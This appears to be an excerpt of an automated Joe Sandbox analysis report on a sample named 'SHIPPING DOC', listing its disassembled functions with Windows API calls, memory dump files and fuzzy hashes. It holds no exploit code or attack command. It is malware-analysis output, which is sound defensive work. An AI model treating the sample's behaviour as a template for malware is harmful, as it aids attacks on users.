                                                                                                                      • Opcode Fuzzy Hash: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                                                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 0044443B
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 00444633
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2354583917-0
                                                                                                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 896007046-0
                                                                                                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                      • GetFocus.USER32 ref: 00448ACF
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429747543-0
                                                                                                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                      • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu$\VH
                                                                                                                      • API String ID: 3164766367-2432546070
                                                                                                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 3850602802-3636473452
                                                                                                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3985565216-0
                                                                                                                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 0041F707
                                                                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                      • _free.LIBCMT ref: 0041F71A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                      • String ID: [B
                                                                                                                      • API String ID: 1020059152-632041663
                                                                                                                      • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                      • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                                      • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                                      • __getptd.LIBCMT ref: 00413DBD
                                                                                                                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                                      • _free.LIBCMT ref: 00413E07
                                                                                                                      • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 155776804-0
                                                                                                                      • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                                      • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                                                                                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3220332590-0
                                                                                                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
